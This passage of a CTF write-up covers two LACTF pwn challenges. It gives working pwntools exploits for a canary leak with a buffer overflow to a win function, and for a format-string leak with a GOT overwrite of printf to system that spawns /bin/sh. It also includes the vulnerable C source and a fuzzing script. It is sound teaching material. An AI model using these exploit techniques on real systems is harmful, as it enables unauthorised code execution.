Now we are at the main function which starts by calling setbuf to help with buffering on the remote server, srand with time(NULL) as the seed so that should be trivial to bypass if needed. There is then a 64 character input buffer (more on that later) and a call to puts. Entering the main while loop, which is the meat and potatoes of this whole program, user input is taken with gets()… so that should be fun. We then arrive at an if statement, the first arm of which checks our input to see if it contains the string "i'm" via strstr(). strstr() will returns a pointer to the position in our input that contains "i'm". If our input does contain "i'm", then the content at the the index of "i'm" within our input buffer + 4 bytes is printed out. The second arm checks our input buffer to see if it has the string "please give me the flag" after which the user is trolled because of course we don’t get help. The third arm checks if we sent in "bye", and if we did the program breaks out of the loop and returns. Finally, if we enter something random, we get one of the many words in the afore mentioned array printed out to us. Below is the source, with many of the options in the array and the header files omitted for brevity.

void print_flag(void) {
  char flag[256];
  FILE *flag_file = fopen("flag.txt", "r");
  fgets(flag, sizeof flag, flag_file);
  puts(flag);
}

const char *const responses[] = {"L",
                                 "amongus",
                                 "cope",
                                 "I use arch btw"};
int main(void) {
  setbuf(stdout, NULL);
  srand(time(NULL));
  char input[64];
  puts("hello");
  while (1) {
    gets(input);
    char *s = strstr(input, "i'm");
    if (s) {
      printf("hi %s, i'm aplet123\n", s + 4);
    } else if (strcmp(input, "please give me the flag") == 0) {
      puts("i'll consider it");
      sleep(5);
      puts("no");
    } else if (strcmp(input, "bye") == 0) {
      puts("bye");
      break;
    } else {
      puts(responses[rand() % (sizeof responses / sizeof responses[0])]);
    }
  }
}

Now that we’ve discussed functionality, lets talk about finding a vulnerability. We know for sure that gets() will allow us a buffer overflow, however there is just one issue; a quick run of checksec tells us there is a canary. Any attempt to clobber the instruction pointer and redirect execution will be thwarted.

We’ll need a way to leak the canary if we want to solve this challenge. Luckily, one such way has presented itself in the form of the first printf. As stated before, if our input contains the string "i'm" then the data at that index + 4 bytes is printed out. We can abuse this by overflowing right up until the canary and terminating our overflow with the string "i'm". That way strstr will identify the index of the "i'm" string which will be 3 bytes before the canary. This can be seen within gdb below.

As seen above, the index of "i'm" is 3 bytes before the canary and the fourth byte would be the first byte of the canary which is always a null byte. So, we can abuse the printf to print out the entire canary, minus the null byte! It took some debugging, but we found that 69 characters of junk are needed plus the "i'm" string at the end to achieve the leak. Now that we’ve got our leak, all thats left is to parse it and write the exploit. Our solve script so far can be seen below.

from pwn import *
elf = context.binary = ELF("aplet123")
context.terminal = ['tmux', 'split-window', '-h']
script = '''
init-pwndbg
break *0x00000000004012b8
'''

p = elf.process()
gdb.attach(p, script)
offset = 69
leak_canary = flat([
    'a' * offset,
    "i'm"
])

p.sendline(leak_canary)
print(p.recvuntil(b'hi'))
recv = p.recv()
recv = recv.split(b',')[0].lstrip(b' ').rstrip(b'\x01')
canary =  int.from_bytes(recv, byteorder='little')
canary = hex(canary) + '00'
canary = int(canary, 16)
print(recv)
print(f'Canary (int) {canary}, (hex) {hex(canary)}')

In the above script, we set up some basic pwntools functionality and setup some simple gdbscript to start debugging. Then we pass in our data to abuse the printf and then receive and process our leak. We also need to remember to account for the null byte in the canary! From here, our exploit should be simple.

All we need to do is pass in junk up to the canary, which we know is 72 bytes (remember, we needed 69 bytes of junk plus 3 bytes for the “i’m” string), our canary we leaked, 8 bytes of junk for rbp, and then the address of our print_flag function. This can all be achieved pretty easily with pwntools, as seen below.

payload = flat([
    'a' * 72,
    canary,
    b'a' * 8,
    elf.symbols['print_flag']
])
p.sendline(payload)
p.sendline(b'bye')

p.interactive()
# lactf{so_untrue_ei2p1wfwh9np2gg6}

And just for fun (and because its always super cool) we can see our payload laid out on the stack within gdb before the main function cleans up the stack and returns.

Finally, after we construct the aforementioned payload, send it in, and then send in the string “bye” to get the program to break out of the main loop and return, we shall have our flag. We will receive said flag in interactive mode. I had fun solving this challenge, on to the next one!

pizza | pwn | 105 solves

This challenge doled out similar source material; a compiled binary (pizza), source code (pizza.c), and a Dockerfile.

Starting to look at the source code, we can start to pick out some of its notable features. Starting with an array of toppings and then an infinite while loop containing the main program logic. Within this loop it looks like the available toppings are being printed out as a menu of sorts, and we can input a choice of an existing topping or a custom topping. It also appears we can enter in a maximum of three toppings. And once our toppings are entered, they are printed back out at using a call to printf with no format specifier… how scandalous. After our topping choices are printed back to us we have an option to start all over again, from viewing the menu to entering toppings, etc etc. I have included the source code below so you can have a peek if you so desire.

const char *available_toppings[] = {"pepperoni", "cheese","olives" "pineapple","apple", "banana","grapefruit", "kubernetes", "pesto","salmon", "chopsticks", "golf balls"};

const int num_available_toppings =
    sizeof(available_toppings) / sizeof(available_toppings[0]);

int main(void) {
  setbuf(stdout, NULL);
  printf("Welcome to kaiphait's pizza shop!\n");
  while (1) {
    printf("Which toppings would you like on your pizza?\n");
    for (int i = 0; i < num_available_toppings; ++i) {
      printf("%d. %s\n", i, available_toppings[i]);
    }
    printf("%d. custom\n", num_available_toppings);
    char toppings[3][100];
    for (int i = 0; i < 3; ++i) {
      printf("> ");
      int choice;
      scanf("%d", &choice);
      if (choice < 0 || choice > num_available_toppings) {
        printf("Invalid topping");
        return 1;
      }
      if (choice == num_available_toppings) {
        printf("Enter custom topping: ");
        scanf(" %99[^\n]", toppings[i]);
      } else {
        strcpy(toppings[i], available_toppings[choice]);
      }
    }
    printf("Here are the toppings that you chose:\n");
    for (int i = 0; i < 3; ++i) {
      printf(toppings[i]);
      printf("\n");
    }
    printf("Your pizza will be ready soon.\n");
    printf("Order another pizza? (y/n): ");
    char c;
    scanf(" %c", &c);
    if (c != 'y') {
      break;
    }
  }
}

So, where to go from here? Well as I aluded to earlier, we will be leveraging the vulnerability that arises when input we control is printed out using printf with no format specifier.

Why is this bad? Well, printf is a variadic function. That means that it can accept a varying number of arguments. For example, it could simple print a string or some other data with it and use a format specifier. However, if user controller data is passed in to printf without a format specifier, it allows a potentially malicious user to supply a format specifier of their own. Perhaps %p which could be used to leak data off the stack or even more fun, %n which allows one to write data. So thinking back to our program, we will have to leverage our ability to make custom toppings to abuse the printf vulnerability present.

But what might we need to leak and where might we need to write? Complicated questions with surprisingly easy answers.

Lets take a look at what checksec has to say about our binary.

Notably, it looks like PIE is enabled, so anything our binary leaks will be randomized. We’ve also got Partial RELRO, so the global offset table is writeable… that will come in handy later. For now, lets take stock of what we need to do. No win function, so we’ll likely need to leverage something in libc which will require a libc leak to defeat ASLR. With Partial RELRO and a printf vulnerability that allows us to write anywhere we want, I’m thinking we’ll do a GOT overwrite; this involves overwriting an entry in the global offset table, like the entry for printf, to something like system so that we can pop a shell. This means that whenever printf is called, it’ll actually call system and since there is an instance where we control the arguments to printf, we could call something like system("/bin/sh"). To know the location of something with the GOT we’ll need a binary leak to defeat PIE, so add that to the list.

That was a lot, but TLDR is we’ll need to do 3 things;

1. Get leaks to defeat PIE within the binary and ASLR within libc
2. Perform the GOT overwrite
3. Pass in “/bin/sh” and pop a shell

Let’s grab our leaks with our first round of 3 topping selections and then we’ll perform the write with another round. To find some useful addresses, GDB is gonna be our best friend. Breaking right after the vulnerable call to printf allows us to inspect the stack to see what possible options we have to leak from.

This was a bit challenging at first, there was a lot of garbage laying around on the stack. To find where exactly I was leaking from, I simply leaked from several different places using the %<num>$p notation. This allowed me to specify certain stack indexes and read the data at that location. I did this several times to get my bearings. The stack layout after the first call to printf in that vulnerable loop is below.

You’ll notice that we have some things that satisfy our requirements. Notably, the address of main and the address of libc_start_main + 133. By debugging (gdb.attach() is your best friend) we can see that the address of main can be found at the 49th offset and can be used by specifying this format string: %49$p. And then waayyy at the bottom, the last element we can see, we’ve got libc_start_main + 133 which we can use for our libc leak and this can be leaked using %67$p as it is at the 67th offset. And that should do it for our leaks!

But lets digress a bit and talk about libc. In order to exploit this, we’ll need to know what version of system to call on remote and thus what libc version the remote binary is running. Thankfully, we were provided with a docker container so we know what image the remote binary is running in. In this case, our dockerfile looks like the following:

FROM pwn.red/jail
COPY --from=debian@sha256:36a9d3bcaaec706e27b973bb303018002633fd3be7c2ac367d174bafce52e84e / /srv
COPY pizza /srv/app/run
COPY flag.txt /srv/app/flag.txt
RUN chmod 755 /srv/app/run

To pull the libc, we can build that debian image, exec into it, and pull the libc. That is what sane people would do. Old me built the image, used docker save to extract the layers, and then went searching for anything resembling a libc. I managed to find one too, only it was the wrong one and it took me about an hour of troubleshooting to figure out why I couldn’t calculate the base addresses properly on remote. Turns out that I pulled a libc with the designation 2.36-9 and the proper libc from that debian image was a special debian one, also version 2.36. On an unrelated note, that new libc didn’t play nice with pwninit and would cause my newly patched binary to immediately segfault! Yay! Thankfully the wrong version, 2.36-9 could be used and the symbols were the same, just the offsets were different. I used that version for local debugging and then when I went to exploit on remote I used the proper debian one.

Digression over, lets look at our solve script so far.

from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload

elf = context.binary = ELF("pizza_patched")
libc = ELF('libc-remote.so.6')
context.terminal = ['tmux', 'split-window', '-h']

# libc_start_call_main + 128 at 47
# main @ 49
# __libc_start_main + 128 @ 67
# fmtstr offset at 31
p = elf.process()
#p = remote("chall.lac.tf", 31134)
script = '''
init-pwndbg
break *(main + 456)
'''
gdb.attach(p, script)

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', "%67$p")
#print(p.recvline())

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', b'%49$p')

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', b'aaaaaaaa%31$p')

p.recvline()

libc_start_main = p.recvline()
libc_start_main = int(libc_start_main.strip(b'\n').decode(), 16) - 133

main = p.recvline()
main = int(main.strip(b'\n').decode(), 16)
main_offset = 0x0000000000001189
elf.address = main - main_offset
print(p.recvline())
print(hex(elf.address))

libc.address = libc_start_main - libc.symbols['__libc_start_main']
print(hex(libc.address))

p.sendline(b'y')

We import some basic libraries and set up our environment, specifying our ELF and our libc to be indexed by pwntools. We then send in our custom toppings and parse the output for each of our leaks; one for the main function and one for libc_start_main + 133. Then we can calculate the base addresses of both the binary and libc using our leaks and offsets we find. Finally, we send in a y to start the program over again to continue our exploit.

Now on to crafting our format string payload. Pwntools, in its infinite wizardry, has the ability to generate format string payloads for us using the fmtstr_payload function so this is what I will use to craft the exploit. I’ll need the offset of the format string (which we’ll have to find) and then a dictionary, where the keys are the address where we want to write data to and then value is the data we want to write there. In this case we want to write to the location of printf in the GOT and we want to write the address of system.

To find the format string offset means to find the point where the stack index we leak will print out the input we send in. So if we send something like aaaaaaaa%<num>$p, where num is a stack index, our leak should look like 0x6161616161616161. It turns out that order matters when finding this offset. I.e. when trying to find this using the third available topping option vs. the first, it changes. Before when using the third available one I found the offset to be 31. Now, since I’m doing it on the second round and using the first topping option to send this payload, it’ll be different. So, I used a simple script to fuzz a bunch of different offsets. This script was heavily inspired by one used by the Youtuber cryptocat in one of his videos. Basically it iterated through stack offsets from 0-100 and passed in aaaaaaa%<i>%p where i was the number of the current iteration. It started the program, sent this in as the first topping option, sent in random options for the others, printed out the input, then started over with a new thread of the program. I’ll include the script at the bottom, but I was able to find that the offset I’d need was 6. So, with this we can look at crafting our payload.

got_printf = elf.got.printf
writes = {got_printf: libc.symbols['system']}
payload = fmtstr_payload(6, writes, write_size='byte')

Well that was fast. With three lines we can generate a format string payload that will write the address of system in place of printf in the GOT. But, as Ace Ventura might say, “Wait, there is just one more thing!”. As seen above I specified the write_size as byte. This would cause a large format string payload to be generated, often too large for the max length 99 that we are given as input via scanf. I realized (took me longer than it should have) that this was the reason my exploit wasn’t working and I sought ways to make it smaller. This lead me down a rabbit hole for sometime, and when I was debugging my exploit, it magically worked all of the sudden! And it gave me quite a shock! Apparently, for some reason that eludes me (I suspect its down to the addresses we’re passing in as “writes”), the above payload I generated is non deterministic. And so I got lucky once with a shorter than 99 length as it is typically around 120 chars. So i tried this about 15 times (lol) on remote and it worked, I popped a shell!

Fast forward to the Tuesday after the CTF had ended, I was watching SloppyJoePirates’ video on the challenge and I realized that you could just change the write_size from byte to short and it would have worked every time and had a length of about 64. Well, ya live and you learn.

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', payload)

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', b'/bin/sh')

p.sendlineafter(b'> ', b'0')
p.interactive()

The final pieces of the script can be seen above; we send in the payload as the first topping, then we send in “/bin/sh” so that the next time printf, now system, is called, that will be its argument and we will pop a shell. Then we specify the topping as pepperoni with “0”, obviously. Another challenge that I enjoyed solving!! Full solve script below.

from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload

elf = context.binary = ELF("pizza_patched")
libc = ELF('libc-remote.so.6')
context.terminal = ['tmux', 'split-window', '-h']

# p = elf.process()
p = remote("chall.lac.tf", 31134)
script = '''
init-pwndbg
break *(main + 456)
'''
#db.attach(p, script)

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', "%67$p")
#print(p.recvline())

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', b'%49$p')

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', b'aaaaaaaa%31$p')

p.recvline()

libc_start_main = p.recvline()
libc_start_main = int(libc_start_main.strip(b'\n').decode(), 16) - 133

main = p.recvline()
main = int(main.strip(b'\n').decode(), 16)
main_offset = 0x0000000000001189
elf.address = main - main_offset
print(p.recvline())
print(hex(elf.address))

libc.address = libc_start_main - libc.symbols['__libc_start_main']
print(hex(libc.address))

p.sendline(b'y')

got_printf = elf.got.printf
writes = {got_printf: libc.symbols['system']}
payload = fmtstr_payload(6, writes, write_size='short')

p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', payload)
p.sendlineafter(b'> ', b'12')
p.sendlineafter(b'topping: ', b'/bin/sh')
p.sendlineafter(b'> ', b'0')
p.interactive()

# lactf{golf_balls_taste_great_2tscx63xm3ndvycw}

And, as promised, the fuzz.py script I made.

from pwn import *
elf = context.binary = ELF("pizza_patched")
for i in range(100):
    try:
        p = elf.process()
        p.sendlineafter(b'> ', b'12')
        p.sendlineafter(b'topping: ', 'aaaaaaaa%{}$p'.format(i))

        p.sendlineafter(b'> ', b'12')
        p.sendlineafter(b'topping: ', b'/bin/sh')

        p.sendlineafter(b'> ', b'12')
        p.sendlineafter(b'topping: ', b'0')
        p.recvline()
        print(i)
        print(p.recvline())
        print(p.recvline())
        print(p.recvline())
        p.sendline(b'y')
        p.close()
    except EOFError:
        pass